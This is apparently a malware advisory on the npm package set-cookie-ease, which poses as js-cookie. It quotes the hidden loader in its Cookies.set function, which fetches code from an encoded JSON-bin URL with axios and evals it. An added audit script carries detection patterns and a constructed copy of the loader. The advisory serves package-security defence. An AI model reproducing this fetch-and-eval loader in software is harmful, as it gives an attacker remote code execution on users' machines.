MAL-2026-6500
Malicious code in set-cookie-ease (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b2bf656ba38b4d951239ee29799f510de4a8cb93fcf5d8005db4cd679a8631e6)

Package masquerades as js-cookie (same banner `/*! js-cookie v3.0.5 | MIT */`, README, and `repository.url: git://github.com/js-cookie/js-cookie.git`) but diverges in `dist/cookie.ease.js`. At lines 46-49, the `Cookies.set` implementation contains `if (typeof document === 'undefined' || attributes.expires == 0) { require('axios').get(atob('...')).then(r => { eval(r.data.content) }); return }`. The base64 string decodes to `https://www.jsonkeeper.com/b/VKUNI`, a public mutable JSON-bin where the maintainer can swap the payload at any time.

The branch fires whenever `document` is undefined (any Node/SSR consumer: Next.js, Nuxt, Remix, etc.) or when a caller passes `expires: 0`, executing arbitrary attacker-controlled JavaScript inside the consumer's Node process with full host privileges. To support this, `package.json` adds `axios` and `request` as dependencies despite the README advertising 'No dependency'.

This satisfies the typosquat-with-malicious-payload class: installer harm is concrete (RCE on first `Cookies.set` call in Node) and the destination is attacker-mutable.
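As an added illustration of how a defender could audit an installed copy for the indicators described above (example code, not part of this advisory or of js-cookie; the sample source, `package.json`, README and URL are constructed):

```javascript
'use strict';
// Added example: decode atob('...') literals, flag fetch-then-eval, and
// cross-check package.json dependencies against a README claiming "No dependency".

// atob('<base64>') or atob("<base64>") string literals in source text.
const ATOB_RE = /atob\((['"])([A-Za-z0-9+/=]+)\1\)/g;
// A required HTTP client followed shortly by eval( of something.
const FETCH_EVAL_RE = /require\(['"](axios|request|https?)['"]\)[\s\S]{0,400}?eval\(/;

function decodeAtobLiterals(src) {
  const out = [];
  for (const m of src.matchAll(ATOB_RE)) {
    out.push(Buffer.from(m[2], 'base64').toString('utf8'));
  }
  return out;
}

function auditPackage({ source, packageJson, readme }) {
  const findings = [];
  const decoded = decodeAtobLiterals(source);
  const urls = decoded.filter((s) => /^https?:\/\//.test(s));
  if (urls.length) findings.push(`obfuscated URL(s): ${urls.join(', ')}`);
  if (FETCH_EVAL_RE.test(source)) findings.push('remote fetch followed by eval()');
  const deps = Object.keys(packageJson.dependencies || {});
  if (deps.length && /no dependenc/i.test(readme)) {
    findings.push(`README claims no dependency but package.json lists: ${deps.join(', ')}`);
  }
  return { decodedStrings: decoded, findings, suspicious: findings.length > 0 };
}

// Constructed sample mirroring the pattern above; the URL is a placeholder.
const SAMPLE_URL_B64 = Buffer.from('https://example.invalid/payload.json').toString('base64');
const SAMPLE_SOURCE = `
function set(name, value, attributes) {
  if (typeof document === 'undefined' || attributes.expires == 0) {
    require('axios').get(atob('${SAMPLE_URL_B64}')).then(r => { eval(r.data.content) }); return
  }
}`;
const SAMPLE_PKG = { name: 'sample-pkg', dependencies: { axios: '^1.0.0', request: '^2.88.0' } };
const SAMPLE_README = 'A simple cookie helper. No dependency.';

const report = auditPackage({ source: SAMPLE_SOURCE, packageJson: SAMPLE_PKG, readme: SAMPLE_README });
console.log(JSON.stringify(report, null, 2));
```

Point `source` at the real `dist/*.js` files of a package under `node_modules` to run the same checks on an installed copy.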
Affected packages
No fixed version published yet for set-cookie-ease (npm). Pin to a known-safe version or switch to an alternative.